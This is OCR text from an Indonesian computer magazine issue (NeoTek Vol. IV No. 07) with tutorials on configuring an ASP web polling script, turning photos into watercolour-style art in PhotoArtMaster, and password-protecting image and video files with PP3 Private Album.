Tampilan halaman polling dapat dipilih oleh pengunjung jika diinginkan. Pengunjung dapat memilih tampian yang disukainya dengan cara memilih jenis tampilan dalam drop-down menu yang juga terdapat pada bagian atas halaman, silakan lihat contoh menu tersebut dalam Gambar 5.

Membuat Polling Baru
Anda dapat membuat sebanyak mungkin polling yang anda inginkan. Ketika anda membuat polling, anda bisa mengkonfigurasi polling tersebut dengan setting sbb : Kata Pengantar Kata pengantar paragraf yang berisi penjelasan singkat mengenai latar belakang dibuatnya polling. Jika anda inginkan anda bisa mengosongkan kolom ini. Jenis Polling Jenis polling dapat dipilih dua jenis, yakni Single-Select. Vol. IV No. 07 NeoTek
43

‘Interaktif’
Adakalanya sebuah polling tidak menyediakan pilihan jawaban yang diinginkan oleh pengunjung. Apa yang dapat dilakukan oleh pengunjung? Salah satu tindakan yang dilakukan oleh pengunjung yang tidak menemukan pilihan jawaban yang cocok dalam sebuah polling, adalah dengan meninggalkan atau mengabaikannya. Untuk menjaga agar pengunjung tetap memberikan suaranya, atau paling tidak pendapatnya, dalam polling ini sang admin bisa men-set apakah polling dapat diberi komentar

NeoTutor
Jenis Form Jika anda membuat polling dengan jenis Single-Select maka disediakan dua jenis form untuk menampilkan pilihan jawaban polling tersebut, yaitu Drop-Down Menu dan Radio-Button. Kadaluwarsa Anda dapat men-set masa kadaluwarsa polling dalam satuan hari dimulai sejak tanggal polling ini dibuat. Jika sebuah polling sudah mencapai masa kadaluwarsa maka polling tersebut tidak dapat diisi lagi. Boleh diberi komentar Sebuah polling dapat di-set apakah boleh diberi komentar atau tidak. Hal ini cukup penting jika ada pengunjung yang tidak malas memberikan suaranya atau tidak menemukan pilihan jawaban yang cocok menurutnya. Membuat Sebuah Polling Menjadi Default Pada saat file index.asp dibuka pengunjung akan langsung di-redirect ke file polling.asp. File polling.asp akan membuka polling yang Default-nya di-set YES. Untuk membuat sebuah polling menjadi default anda sebagai admin dapat melakukannya melalui link yang disediakan pada bagian bawah polling pada saat polling tersebut ditampilkan. Mengunci dan Membuka Polling Sebuah polling meskipun masa kadaluwarsanya belum habis tidak dapat diisi lagi jika dalam keadaan terkunci. Sebuah polling dapat dibuka atau dikunci dengan cara memilih link yang terdapat di bagian bawah polling.

Bahasa
Pada paragraf di atas saya sedikit menyinggung tentang penggunaan berbagai bahasa dalam program polling ini. Kosa-kata bahasa-bahasa yang digunakan tersebut disimpan dalam file *.asp yang disesuaikan dengan nama bahasanya. File-file tersebut disimpan dalam folder Bahasa. File-file bahasa tersebut antara lain: Bahasa_Indonesia.asp Bahasa_Jerman.asp Bahasa_Italia.asp Bahasa_Spanyol.asp Bahasa_Yunani.asp Bahasa_Jawa.asp Bahasa_Sunda.asp Bahasa_Sansakerta.asp Bahasa_Inggris.asp Bahasa_Arab.asp Bahasa_Madura.asp Bahasa_Prancis.asp Bahasa_Belanda.asp Bahasa_Jepang.asp Bahasa_Mandarin.asp Bahasa_Melayu.asp Bahasa_Rusia.asp File-file bahasa tersebut di atas belum berisi kosa-kata bahasa yang bersesuaian, karena kosa-katanya masih Bahasa Indonesia. Untuk itu jika anda menguasai berbagai bahasa tersebut sebaiknya anda mengedit ulang dengan cara mengganti masing-masing variable yang berisi kosa kata bahasa tersebut. Jika anda ingin menonaktifkan salah satu bahasa cukup dengan cara menghapus salah satu item dalam variable array berikut ini: DaftarBahasa="Indonesia,Jerman,Italia,Spanyol,Yunani,Ja wa,Sunda,Sansakerta,English,Arab,Madura,Prancis,Beland a,Jepang,Mandarin,Melayu,Rusia" Varable tersebut tercatat dalam file Bahasa.asp dalam folder Bahasa. Demikianlah polling ini saya buat untuk anda, terutama untuk pemula seperti saya. Mohon maaf jika ada kekurangan dan kesalahan. Semoga bermanfaat.

Mengedit Polling
Polling yang sudah ada dapat anda edit kembali dengan cara cukup fleksibel. Anda bisa melakukan perubahan-perubahan terhadapa polling yang diedit sbb: Mengubah Jenis Polling Sebuah polling dapat diedit dari jenis Single-Select menjadi Multiple-Selcet, dan sebaliknya dari Multiple-Select menjadi Single-Select. Mengubah Jenis Form Polling dengan jenis Single-Select disediakan dua jenis form yakni Drop-Down-Menu dan Radio-Button. Anda dapat mengubah kembali jenis form-nya dari Drop-DownMenu menjadi Radio-Button, atau sebaliknya dari RadioButton menjadi Drop-Down-Menu. Mengubah Masa Kadaluwarsa Sebuah polling dapat diubah kembali masa kadaluwarsanya dengan memilih angka atau lama kadaluwarsanya. Jika sebuah polling masa kadaluwarsanya diubah kembali maka polling tersebut dapat diisi suara kembali. Sebaliknya polling yang masa kadaluwarsanya sudah habis maka polling tersebut tidak dapat diisi kembali. Mengubah Bunyi Pertanyaan Pertanyaan polling dapat diedit. Menambah/Mengurangi Pilihan Jawaban Pilihan-pilihan jawaban polling yang sudah ada dapat ditambah atau dikurangi sesuka hati. Mengosongkan Seluruh Suara Yang Sudah Masuk Anda dapat meng-NOL-kan atau mengosongkan kembali seluruh suara yang sudah masuk dalam sebuah polling. Meng-update Tanggal Polling Tanggal polling dapat di-update atau diganti dengan tanggal sekarang sehingga polling dapat aktif kembali dan boleh diberi suara. Menghapus Polling Untuk menghapus sebuah polling anda tidak perlu menggunakan formulir, cukup melalui link yang disediakan pada bagian bawah polling pada saat polling tersebut ditampilkan. Untuk melakukannya tentu saja anda sebagai admin harus dalam keadaan login.
44

NeoTek Vol. IV No. 07

NeoStyle

PHOTOARTMASTER
LUKISAN CAT AIR SENIMAN DADAKAN
Ubah foto apa saja menjadi suatu karya seni dengan hanya beberapa langkah, seperti yang dimungkinkan menggunaka software manipulasi foto PhotoArtMaster Classic 1.5 ini. Siapa pun kini bisa menjadi seniman dadakan!

bentuk dengan Photoshop bukanlah hal yang aneh, tetapi bagaiman apabila tidak ingin repot-repot dengan kecanggihan Photoshop, tetapi mau dengan cepat dan mudah mengaplikasikan efekefek khusus pada foto kita agar menjadi suatu karya seni? Jawabannya ada pada software manipulasi foto dari fo2pix, yaitu PhotoArtMaster. Ada berbagai versi dari software ini, tetapi yang disediakan adalah PhotoArtMaster 1.5 (trial version 16 kali pakai) yang unlock keynya dapat anda minta dengan mengirim email ke Mag@fo2pix.com dengan subject PC User Classic, yang akan dikirim pada anda lewat email.

B

ANHWA EFEK-EFEK KHUSUS DAPAT DI-

Penerapan berbagai efek khusus yang memungkinkan pembentukan karya seni dari suatu foto biasa.

A

LUKISAN CAT AIR?
Ingin membuat lukisan cat air seartistik ini, tetapi tidak punya bakat? Tidak usah kecil hati, sebab lukisan di atas sebenarnya merupakan hasil penerapan efekefek khusus terhadap suatu foto.

1

TRIAL VERSION
PhotoArtMaster Classic 1.5 yang tersedia berupa trial version yang berfungsi penuh, tetapi hanya dapat dipakai 16 kali, seperti tampak pada pesan pembukanya. Layar yang pertama kali tampil adalah Picture Central dengan gambar default foto bunga matahari.

2

PICTURE CENTRAL
Anda bisa mengganti gambar yang akan diproses ini, tapi dalam contoh kita akan gunakan foto ini. Klik Minimum Size agar proses lebih cepat, setelah itu klik tombol Go to Studio untuk masuk ke layar kerja (Studio Session).

B

INI BAHAN BAKUNYA
Foto yang dijadikan bahan adalah foto di atas. Sulitkah menerapkan efek-efek khusus yang mengubah suatu foto menjadi karya seni? Tidak juga apabila menggunakan PhotoArtMaster Classic 1.5 dari fo2pix yang dapat anda peroleh dari CD NeoTek kali ini.

3

MENU STUDIO
Untuk memulai dari awal sekali (blank) klik Totally Replace Canvas and Fix dan kini statusnya Ready. Lihat ke bagian bawah dan pilih tab Hints: Photo Art untuk melihat macam-macam efek seni foto yang tersedia.

Vol. IV No. 07 NeoTek

45

NeoStyle

4

EFEK LINE DRAWING
Pilih efek No. 6 yang akan dimuat pada window pane di sebelah kiri atas. Apabila dianggap garisgarisnya kurang tegas, dapat anda perkuat dengan mengatur efek Contrast. Apabila sudah puas, klik Fix Artwork or press Return.

5

PINDAHKAN KE BIDANG KERJA
Selanjutnya klik Overlay Canvas Using Mixers yang akan memindahkan artwork dari window pane kecil di kiri atas ke window pane utama yang merupakan bidang kerja kita.

6

LAPISAN PERTAMA
Kini pada window pane utama sudah terdapat hasil tahap pertama karya seni kita, yaitu berupa line drawing dari foto bunga matahari tadi, yang tampak seolaholah hasil goresan pensil.

7

BERI EFEK LATAR BELAKANG
Untuk memberi goresan latar belakang dengan ‘pensil’ juga, klik efek No. 4 (juga dari tab Hints: Photo Art). ‘Goresn pensil’ ini dapat anda atur lebih halus atau lebih kasar dengan mengatur lewat opsi-opsi Contrast atau Darken.

8

GABUNGKAN KE SEBELUMNYA
Klik kembali Overlay Canvas Using Mixers untuk menggabungkan goresan latar belakang ke line drawing yang telah ada sebelumnya di window pane utama. Apabila ada detail-detail kecil yang ingin anda tambahkan anda bisa gunakan kuas yang tersedia dalam berbagai bentuk dan ukuran.

9

‘GAMBAR PENSIL’ LENGKAP
Efek No.3 (tidak dibahas) dapat digunakan untuk ‘menghapus’ goresan yang tidak perlu. Kini gambar pensil anda lengkap sudah dan tinggal memberi efek warna pada gambar anda.

10

EFEK CAT AIR
Pada tab Hints: Photo Art pilih efek No. 6 yang juga akan dimuat ke window pane sebelah kiri atas. Efek ini adalah pemberian warba pada bidang utama pada gambar.

46

NeoTek Vol. IV No. 07

NeoStyle

11

PEMBERIAN WARNA FOKUS
Setelah penyesuaian warna sesuai dengan selera anda, klik Overlay Canvass Using Mixers yang akan menggabungkan lagi bagian ini pada hasil karya tahap kedua sebelumnya pada window pane utama.

12

WARNA PADA GORESAN PENSIL
Kini karya seni anda sudah berbentuk, yaitu goresan pensil lengkap dengan latar belakang gelap serta latar depan berupa pemberian warna pada bidang perhatian utama, yang dalam hal ini adalah pada bunganya.

13

FINISHING
Untuk menyelesaikan karya seni sederhana ini, pilih efek No. 13 dari tab Hints: Photo Art yang akan memberi warna lembut pada latar belakang.

14

HASIL AKHIR
Setelah meng-klik Overlay Canvass Using Mixers maka karya seni kita pun selesai, yaitu dengan diaplikasikannya latar belakang warna yamng lembut.

15

FIX ARTWORK
Gabungan efek-efek tadi sudah memberikan hasil akhir yang kita inginkan, jadi klik Fix Artwork or Press Return.

16

SAVE AS...
Selanjutnya pilih File > Save Canvass As... dan tetapkan nama file, format, serta direktori penyimpanannya.

17

BELAJAR LEBIH LANJUT
Masih banyak efek-efek yang belum sempat dibahas dan dapat anda coba sendiri. Anda juga dapat melihat tutotoial atau portofolio karya seni yang dibuat menggunakan software ini di situs fo2pix: http://www.fo2pix.com/index.php

Vol. IV No. 07 NeoTek

47

NeoStyle

PP3 PRIVATE ALBUM
MENJAGA PRIVACY GAMBAR DAN VIDEO
Anda mungkin mempunyai koleksi gambar (atau video) yang hanya boleh dilihat oleh orang-orang tertentu saja. PP3 Private Album diperkenalkan oleh T. C. Kusuma (TCKusuma@softhome.net) sebagai solusi prakris dan mudah untuk privacy anda.

suskan diri memproteksi file-file gambar dari beragam format. Melindunginya agar tidak dapat dilihat oleh yang tidak berkepentingan. Cara kerjanya dengan memberikan password pada file gambar sehingga hanya orangorang yang mengetahui password-nya yang dapat melihat isi file gambar tersebut. Program sederhana keluaran Mediachance ini cukup baik, karena melindungi hampir seluruh ekstensi/format yang digunakan file gambar. Di samping dapat pula digunakan untuk melindungi file-file video.

A

DA SOLUSI UNTUK MASALAH PROTEKSI ini, YAITU program yang mengkhu-

Cegah foto-foto (atau video) pribadi anda terlihat oleh yang tidak berkepentingan

1

DOWNLOAD DAN INSTALL
Kunjungilah www.Mediachance.com dan download pp3trial.exe (710kB) untuk men-download file Setup. Selesai download, lakukan instalasi dengan klik ganda pada file Setup.Exe tadi dan kini anda dapat menggunakan versi trial dari PP3Private Album. Klik I Agree untuk menjalankan program tersebut.

2

MENENTUKAN FILE GAMBAR
Setelah jendela program PP3 terbuka, tentukan folder tempat file-file gambar anda simpan.

3

MEMPROTEKSI FILE GAMBAR
Untuk memproteksi sebuah file anda cukup tandai file tersebut dan tekan menu File > Protect atau menekan tombol Protect File pada toolbar, kemudian anda diminta untuk memasukkan Password yang anda inginkan untuk mengunci file tersebut.

4

CARA KERJA
Program PP3 bekerja dengan membuat backup file baru yang diproteksi dan bukan mengunci file asli. Pilihan Remember password in this session akan memberikan Password yang sama selama program berjalan, sedangkan pilihan Delete original file(s) akan menghapus file asli atau original file, tekan OK.

48

NeoTek Vol. IV No. 07

NeoStyle

Iklan visionnet

5

PROTEKSI SEMUA FILE
Proteksi semua file gambar dalam satu folder tertentu lewat Directory > Protect All atau Protect Directory. Masukan Password yang anda gunakan dan OK. Jika sebelumnya menandai pilihan Remember password in this session, maka secara otomatis folder diproteksi dengan password yang sama.

6

CARA MEMBUKANYA
Untuk buka file tersebut, klik ganda pada nama file yang diproteksi dan masukan password yang anda gunakan. Untuk menghilangkan password pada file, pilih file yang diproteksi dan klik menu File > Unprotect atau tekan Unprotect file pada toolbar dan masukkan password yang anda gunakan.

7

PASSWORD DALAM DIREKTORI
Menghilangkan password beberapa file dalam directory atau folder: pilih menu Directory > Unprotect atau Unprotect Directory dan masukkan password yang anda gunakan. Langkah-langkah proteksi ini berlaku pula pada file video. Ingat bahwa file yang diproteksi mungkin akan jauh lebih ukurannya.


				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:1338
posted:1/10/2010
language:Malay
pages:50